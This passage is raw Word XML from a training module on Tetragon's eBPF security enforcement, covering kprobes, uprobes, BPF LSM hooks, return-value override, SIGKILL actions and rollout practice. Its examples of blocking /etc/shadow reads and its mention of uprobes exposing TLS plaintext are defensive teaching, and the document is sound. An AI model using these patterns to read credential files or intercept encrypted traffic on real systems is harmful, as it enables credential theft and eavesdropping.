          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Function names change between kernel versions (potentially breaking).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kprobe performance is slightly higher cost than tracepoints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Useful for observing behavior that doesn't have a stable tracepoint. Tetragon's file observability uses kprobes on security_file_open (an LSM function).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.4 Kretprobes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kretprobes hook the RETURN of a kernel function. Useful when you care about the RESULT — did the operation succeed? What value was returned?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon uses kretprobes sparingly; most policies care about the INVOCATION, not the result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.5 Uprobes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hook userspace binary functions. Tetragon uses uprobes for language-specific visibility:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TLS functions (SSL_write, SSL_read for plaintext observation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Runtime-specific functions (Node.js internals, Python interpreter).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Overlap with Pixie's approach (Module 5). Tetragon tends to use uprobes less than Pixie because its focus is security, not protocol parsing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.6 BPF LSM — The Enforcement Hook</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The KEY hook for Tetragon's enforcement capability is BPF LSM. This is a kernel feature added in Linux 5.7 (2020) that allows eBPF programs to act as Linux Security Modules — meaning they can DENY syscalls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LSM (Linux Security Module) is an existing kernel framework for security hooks. SELinux and AppArmor are classical LSMs. BPF LSM lets eBPF programs participate in the same framework.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.6.1 What LSM Hooks Do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At security-critical points in the kernel, LSM hooks are called. For example, when a process tries to open a file, the kernel calls:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">security_file_open(file, cred) — if this returns non-zero, the open fails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LSMs can refuse operations by returning a non-zero error code. eBPF programs attached via BPF LSM can do the same.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.6.2 Available LSM Hooks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dozens of LSM hooks cover security-relevant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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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guards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security_file_open</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 opens</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security_file_permission</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 reads/writes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security_bprm_check_security</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 program execution</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security_bprm_committed_creds</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Credentials of new exec</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security_socket_connect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Outbound connections</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security_socket_bind</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Listening sockets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security_capable</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Capability checks</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security_ptrace_access_check</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Debugging/attach</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security_task_kill</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Signal delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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security_inode_unlink</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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File deletion</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security_mount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Mount operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon can attach eBPF programs to any of these. Each hook is a potential enforcement point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.7 Hook Selection Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When writing a Tetragon policy, WHICH HOOK TO USE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.7.1 For Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prefer tracepoints when they exist. Stable across kernels. For specifics not covered by tracepoints, use kprobes on LSM functions (doubles as a hook that may later be promoted to enforcement).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.7.2 For Enforcement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use BPF LSM hooks. This is the only way to GUARANTEE enforcement — the kernel will honor the hook's decision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.7.3 Kprobe Override Technique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon supports a POWERFUL trick: return-value override on kprobes. If a kprobe is attached to a function that normally returns an error code, Tetragon can MODIFY that return value. This enables lighter-weight enforcement without BPF LSM:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Attached to security_file_open as a kprobe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Override return value to -EPERM when matched</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">matchActions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- action: "Override"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  argError: -1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This works on kernels without BPF LSM. Broader compatibility, slightly less elegant than full LSM enforcement.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8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">How Enforcement Actually Works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.1 The Block Sequence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When a Tetragon enforcement policy blocks an action, here's EXACTLY what happens:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Application calls a syscall (e.g., open("/etc/shadow", O_RDONLY))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Kernel starts processing the syscall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Kernel reaches security_file_open LSM hook</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Attached eBPF program runs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Reads file path argument</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Looks up process in BPF map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Evaluates selectors against policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Matches! → return -EPERM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LSM hook returns -EPERM to kernel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6. Kernel aborts the syscall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7. open() returns -1 to application, errno=EPERM</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8. Application sees "Permission denied"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 (in parallel)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Tetragon agent logs the denied event</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 4 takes MICROSECONDS. The decision happens synchronously — the application doesn't see any delay beyond what it would normally experience for a denied syscall. No userspace involvement. No round-trip.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From the application's perspective, the file LOOKS LIKE IT SIMPLY CAN'T BE ACCESSED — which is correct. The kernel says no.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.2 The SIGKILL Sequence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon's Signal action can KILL processes, not just deny specific syscalls. Sequence:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Application does something that matches policy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2. eBPF program matches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3. eBPF program calls bpf_send_signal(SIGKILL)</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4. Kernel delivers SIGKILL to the current process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5. Process is TERMINATED</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6. Tetragon agent logs the kill event</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The process DIES. No further syscalls; no further harm. The container may or may not survive (depends on what was killed — if you SIGKILL PID 1 of the container, the container dies).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compare to Falco + Talon: Falco detects → Talon receives alert → Talon calls Kubernetes API → Kubernetes kills the pod. The POD dies. Much coarser granularity; more delay.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.3 When Blocking Fails</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon's enforcement is not perfect. Scenarios where blocking might fail:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.3.1 No LSM Hook for the Operation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Some kernel operations don't have LSM hooks. Tetragon can observe them (via kprobes/tracepoints) but can't block. Workaround: use kprobe override where possible; accept coverage gap otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.3.2 Kernel Doesn't Support BPF LSM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On kernels older than 5.7, BPF LSM isn't available. Enforcement falls back to kprobe override (less powerful, fewer hooks) or is disabled entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.3.3 Kernel Doesn't Have BPF LSM Enabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BPF LSM is a COMPILE-TIME option. Some distributions don't enable it. Check /sys/kernel/security/lsm — if bpf is listed, it's available. If not, you can't do BPF LSM enforcement even on a newer kernel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.3.4 Race Conditions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For operations with complex argument parsing or across multiple syscalls, there's a theoretical window where the eBPF program's view diverges from the kernel's. Tetragon mitigates this through careful hook selection, but it's not theoretical zero-risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.4 Fail-Safe Modes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon has fail-safe modes for robustness:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.4.1 Observability Mode (Default)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Policies emit events but don't block. You see what WOULD have been blocked without the risk of breaking workloads. Safe default for initial deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.4.2 Enforcement Mode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Policies actively enforce. Requires explicit opt-in via matchActions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.4.3 Hybrid Policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Some match-cases observe; others enforce. E.g., observe reads of /etc/shadow by known-good processes; block reads by other processes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.4.4 Per-Policy Enablement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each TracingPolicy CRD is independently enabled or disabled. You can selectively turn off a misbehaving policy without affecting others.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.5 The Observability-First Rollout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recommended deployment pattern:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Write policy in OBSERVABILITY-ONLY mode (no matchActions or action: Post only).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy to staging. Observe events. Verify rules match as expected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy to production in observability mode. Monitor for a week. Check every matched event — would blocking have been correct?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add exceptions for legitimate matches (refine selectors).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Switch to ENFORCEMENT mode only after zero false positives observed for multiple days.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor post-enforcement. Anything broken?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document the policy, its expected behavior, and kill-switch procedure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Most organizations run Tetragon mostly in observability mode. Only a small set of high-confidence, high-impact rules run in enforcement. This is similar to how Falco + Talon should be run — with Tetragon, the transition is more natural because it's in the same tool.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9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">BPF LSM: The Enforcement Foundation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">9.1 A Brief History</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Linux Security Modules (LSM) is a FRAMEWORK dating to 2001. The idea: instead of monolithic security code in the kernel, define HOOKS at security-relevant points where modular security implementations can insert policy checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Classic LSMs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
